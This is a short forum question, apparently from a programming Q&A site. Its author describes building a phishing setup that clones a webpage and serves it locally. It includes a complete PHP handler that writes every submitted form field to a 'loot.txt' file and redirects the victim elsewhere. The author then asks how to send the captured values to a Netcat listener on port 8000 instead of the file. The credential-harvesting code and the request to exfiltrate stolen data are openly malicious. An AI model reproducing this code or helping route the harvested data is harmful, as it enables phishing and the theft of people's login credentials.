# how i can send post to my netcat listener

Tags: php, netcat

I'm trying to make a `python` phishing  `script`:

1. I make the first step is to clone the `HTML` of the webpage.
2. I make os.system (python3 -m http.server 8080)
3. I make the `post.php`.

---

```
<?php
  header ('Location: http://checkyouinternet.com');
  $handle = fopen("loot.txt", "a");
  foreach($_POST as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
  }
  fwrite($handle, "\r\n\n\n\n");
  fclose($handle);
  exit;
?>
```

---

but my problem is how I can make my script not send his value to a `log.txt`
I want it to send him to my `Netcat` listener in port `8000`.